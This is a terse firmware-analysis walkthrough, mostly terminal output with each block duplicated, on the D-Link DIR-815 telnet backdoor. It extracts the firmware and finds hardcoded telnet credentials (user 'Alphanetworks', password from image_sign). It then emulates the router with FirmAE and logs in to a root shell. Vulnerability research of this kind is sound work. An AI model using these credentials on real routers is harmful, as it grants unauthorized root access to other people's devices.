D-Link DIR-815后门漏洞

➜  binwalk -Me dir815_FW_102.bin

Scan Time:     2026-01-15 09:01:00
Target File:   /home/ra1ny/FirmAE/dir815_FW_102.bin
MD5 Checksum:  b2d6476de9b8270255dd6cb6329eb51d
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             DLOB firmware header, boot partition: "dev=/dev/mtdblock/2"
108           0x6C            LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3017436 bytes
983148        0xF006C         PackImg section delimiter tag, little endian size: 8399360 bytes; big endian size: 2785280 bytes

WARNING: Extractor.execute failed to run external extractor 'sasquatch -p 1 -le -d 'squashfs-root' '%e'': [Errno 2] No such file or directory: 'sasquatch', 'sasquatch -p 1 -le -d 'squashfs-root' '%e'' might not be installed correctly

WARNING: Extractor.execute failed to run external extractor 'sasquatch -p 1 -be -d 'squashfs-root' '%e'': [Errno 2] No such file or directory: 'sasquatch', 'sasquatch -p 1 -be -d 'squashfs-root' '%e'' might not be installed correctly
983180        0xF008C         Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2783169 bytes, 1526 inodes, blocksize: 262144 bytes, created: 2012-01-19 04:03:49


Scan Time:     2026-01-15 09:01:00
Target File:   /home/ra1ny/FirmAE/_dir815_FW_102.bin.extracted/6C
MD5 Checksum:  e9da4a0f342b4fc9956f725fdb46f640
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
1227270       0x12BA06        PGP RSA encrypted session key - keyid: 801000 EA RSA Encrypt-Only 1024b
1227374       0x12BA6E        PGP RSA encrypted session key - keyid: 801000 EA RSA Encrypt-Only 1024b
2096096       0x1FFBE0        MySQL MISAM compressed data file Version 8
2096332       0x1FFCCC        MySQL MISAM compressed data file Version 8
2445344       0x255020        Linux kernel version 2.6.33
2487024       0x25F2F0        CRC32 polynomial table, little endian
2643904       0x2857C0        Neighborly text, "NeighborSolicitstunnel6 init(): can't add protocol"
2643924       0x2857D4        Neighborly text, "NeighborAdvertisementst add protocol"
2648675       0x286A63        Neighborly text, "neighbor %.2x%.2x.%.2x:%.2x:%.2x:%.2x:%.2x:%.2x lost on port %d(%s)(%s)"

➜  binwalk -Me dir815_FW_102.bin

Scan Time:     2026-01-15 09:01:00
Target File:   /home/ra1ny/FirmAE/dir815_FW_102.bin
MD5 Checksum:  b2d6476de9b8270255dd6cb6329eb51d
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             DLOB firmware header, boot partition: "dev=/dev/mtdblock/2"
108           0x6C            LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3017436 bytes
983148        0xF006C         PackImg section delimiter tag, little endian size: 8399360 bytes; big endian size: 2785280 bytes

WARNING: Extractor.execute failed to run external extractor 'sasquatch -p 1 -le -d 'squashfs-root' '%e'': [Errno 2] No such file or directory: 'sasquatch', 'sasquatch -p 1 -le -d 'squashfs-root' '%e'' might not be installed correctly

WARNING: Extractor.execute failed to run external extractor 'sasquatch -p 1 -be -d 'squashfs-root' '%e'': [Errno 2] No such file or directory: 'sasquatch', 'sasquatch -p 1 -be -d 'squashfs-root' '%e'' might not be installed correctly
983180        0xF008C         Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2783169 bytes, 1526 inodes, blocksize: 262144 bytes, created: 2012-01-19 04:03:49


Scan Time:     2026-01-15 09:01:00
Target File:   /home/ra1ny/FirmAE/_dir815_FW_102.bin.extracted/6C
MD5 Checksum:  e9da4a0f342b4fc9956f725fdb46f640
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
1227270       0x12BA06        PGP RSA encrypted session key - keyid: 801000 EA RSA Encrypt-Only 1024b
1227374       0x12BA6E        PGP RSA encrypted session key - keyid: 801000 EA RSA Encrypt-Only 1024b
2096096       0x1FFBE0        MySQL MISAM compressed data file Version 8
2096332       0x1FFCCC        MySQL MISAM compressed data file Version 8
2445344       0x255020        Linux kernel version 2.6.33
2487024       0x25F2F0        CRC32 polynomial table, little endian
2643904       0x2857C0        Neighborly text, "NeighborSolicitstunnel6 init(): can't add protocol"
2643924       0x2857D4        Neighborly text, "NeighborAdvertisementst add protocol"
2648675       0x286A63        Neighborly text, "neighbor %.2x%.2x.%.2x:%.2x:%.2x:%.2x:%.2x:%.2x lost on port %d(%s)(%s)"

git clone https://github.com/devttys0/sasquatch
cd sasquatch && ./build.sh

git clone https://github.com/devttys0/sasquatch
cd sasquatch && ./build.sh

unsquashfs.c:1835:5: error: this ‘if’ clause does not guard... [-Werror=misleading-indentation]
 1835 |     if(swap)
      |     ^~
unsquashfs.c:1841:9: note: ...this statement, but the latter is misleadingly indented as if it were guarded by the ‘if’
 1841 |         read_fs_bytes(fd, SQUASHFS_START, sizeof(struct squashfs_super_block),
      |         ^~~~~~~~~~~~~
cc1: all warnings being treated as errors
make: *** [<builtin>: unsquashfs.o] Error 1

unsquashfs.c:1835:5: error: this ‘if’ clause does not guard... [-Werror=misleading-indentation]
 1835 |     if(swap)
      |     ^~
unsquashfs.c:1841:9: note: ...this statement, but the latter is misleadingly indented as if it were guarded by the ‘if’
 1841 |         read_fs_bytes(fd, SQUASHFS_START, sizeof(struct squashfs_super_block),
      |         ^~~~~~~~~~~~~
cc1: all warnings being treated as errors
make: *** [<builtin>: unsquashfs.o] Error 1

git pull origin pull/56/head && ./build.sh

git pull origin pull/56/head && ./build.sh

cd _dir815_FW_102.bin-2.extracted

cd _dir815_FW_102.bin-2.extracted

git clone https://github.com/craigz28/firmwalker.git
cd firmwalker

git clone https://github.com/craigz28/firmwalker.git
cd firmwalker

./firmwalker.sh ../squashfs-root ./dir815.txt

./firmwalker.sh ../squashfs-root ./dir815.txt

t/etc/init0.d/S80telnetd.sh

t/etc/init0.d/S80telnetd.sh

➜  squashfs-root git:(master) ✗ cat etc/init0.d/S80telnetd.sh 
#!/bin/sh
echo [$0]: $1 ... > /dev/console
if [ "$1" = "start" ]; then
        if [ -f "/usr/sbin/login" ]; then
                image_sign=`cat /etc/config/image_sign`
                telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &
        else
                telnetd &
        fi
else
        killall telnetd
fi

➜  squashfs-root git:(master) ✗ cat etc/init0.d/S80telnetd.sh 
#!/bin/sh
echo [$0]: $1 ... > /dev/console
if [ "$1" = "start" ]; then
        if [ -f "/usr/sbin/login" ]; then
                image_sign=`cat /etc/config/image_sign`
                telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &
        else
                telnetd &
        fi
else
        killall telnetd
fi

➜  squashfs-root cat ./etc/config/image_sign
wrgnd08_dlob_dir815

➜  squashfs-root cat ./etc/config/image_sign
wrgnd08_dlob_dir815

git clone --recursive https://github.com/pr0v3rbs/FirmAE
./download.sh
./install.sh

git clone --recursive https://github.com/pr0v3rbs/FirmAE
./download.sh
./install.sh

sudo ./run.sh -r dir815 ./dir815_FW_102.bin

sudo ./run.sh -r dir815 ./dir815_FW_102.bin

➜  FirmAE git:(master) ✗ sudo ./run.sh -r dir815 ./dir815_FW_102.bin
[sudo] password for ra1ny: 
[*] ./dir815_FW_102.bin emulation start!!!
[*] Extract done!!!
[+] get architecture done!!!
[+] Start emulation!!!

[IID] 2
[MODE] run
[*] ./dir815_FW_102.bin already succeed emulation!!!
[+] Network reachable on 192.168.0.1!
[+] Web service on 192.168.0.1
Creating TAP device tap2_0...
Set 'tap2_0' persistent and owned by uid 0
Bringing up TAP device...
Starting emulation of firmware... 192.168.0.1 true true 5.169506216 25.379649267

➜  FirmAE git:(master) ✗ sudo ./run.sh -r dir815 ./dir815_FW_102.bin
[sudo] password for ra1ny: 
[*] ./dir815_FW_102.bin emulation start!!!
[*] Extract done!!!
[+] get architecture done!!!
[+] Start emulation!!!

[IID] 2
[MODE] run
[*] ./dir815_FW_102.bin already succeed emulation!!!
[+] Network reachable on 192.168.0.1!
[+] Web service on 192.168.0.1
Creating TAP device tap2_0...
Set 'tap2_0' persistent and owned by uid 0
Bringing up TAP device...
Starting emulation of firmware... 192.168.0.1 true true 5.169506216 25.379649267

➜  ~ nmap 192.168.0.1
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-15 11:12 CST
Nmap scan report for 192.168.0.1
Host is up (0.0064s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT      STATE SERVICE
23/tcp    open  telnet
53/tcp    open  domain
80/tcp    open  http
49152/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds

➜  ~ nmap 192.168.0.1
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-15 11:12 CST
Nmap scan report for 192.168.0.1
Host is up (0.0064s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT      STATE SERVICE
23/tcp    open  telnet
53/tcp    open  domain
80/tcp    open  http
49152/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds

➜  ~ telnet 192.168.0.1                       
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
login: Alphanetworks
Password: wrgnd08_dlob_dir815

# pwd
/
# ls
root        www         sys         lib         dev
run         var         sbin        htdocs      bin
etc_ro      usr         proc        home        lost+found
firmadyne   tmp         mnt         etc

➜  ~ telnet 192.168.0.1                       
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
login: Alphanetworks
Password: wrgnd08_dlob_dir815

# pwd
/
# ls
root        www         sys         lib         dev
run         var         sbin        htdocs      bin
etc_ro      usr         proc        home        lost+found
firmadyne   tmp         mnt         etc